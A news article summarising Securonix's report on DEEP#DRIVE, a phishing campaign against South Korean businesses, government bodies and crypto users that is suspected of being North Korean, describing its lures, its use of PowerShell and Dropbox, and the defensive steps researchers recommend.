North Korean hackers are suspected to be behind a phishing attack campaign named DEEP#DRIVE that has targeted various South Korean entities, causing thousands of victims. The cyber espionage operation, discovered by Securonix, has been ongoing since September 2024 and aims to gather sensitive information from businesses, government entities, and cryptocurrency users in South Korea.
The attackers utilized tailored phishing lures in Korean language, disguised as legitimate documents like work logs, insurance papers, and crypto-related files to infiltrate the targeted environments successfully. One example shared by Securonix is a phishing lure posing as the Telegram.exe application, labeled in Korean as 대차 및 파레트 (bogie and pallet), showing logistics-related details to deceive victims in the logistics sector.
These phishing lures were distributed in trusted file formats like .hwp, .xlsx, and .pptx and hosted on popular platforms like Dropbox to bypass traditional security defenses and blend in with normal user behavior. According to Securonix researchers, phishing was the main method of malware distribution in this campaign, as indicated by the collected samples and filenames aligning with common themes and wording found in phishing lures.
The attack campaign heavily relied on PowerShell scripts for payload delivery, reconnaissance, and establishing persistence within the compromised systems. Dropbox was also used for data exfiltration. The attack chain typically started with a .lnk file disguised as a legitimate document, which triggered the execution of malicious PowerShell scripts, leading to the download of further payloads and reconnaissance activities.
The final payload, suspected to be a backdoor, was often delivered through a script named “temp.ps1,” although researchers were unable to capture it during analysis. The attackers’ Dropbox account contained compromised system configuration files and various malicious payloads. Stealth and obfuscation techniques were used to avoid detection, with the removal of associated Dropbox links indicating temporary attack infrastructure.
While the attackers’ infrastructure seemed short-lived, the tactics, techniques, and procedures (TTPs) closely resembled those used by Kimsuky, a North Korean Advanced Persistent Threat (APT) group known for targeting South Korea. Securonix recommends user education on phishing, monitoring of malware staging directories, and reliable endpoint logging, such as PowerShell logging, to protect against similar attacks.
In conclusion, the DEEP#DRIVE phishing attack campaign orchestrated by North Korean hackers against South Korean entities highlights the ongoing threat of cyber espionage and the importance of robust security measures to safeguard against such malicious activities. By understanding the techniques employed by threat actors and implementing preventative measures, organizations can strengthen their cybersecurity posture and mitigate the risk of falling victim to targeted attacks.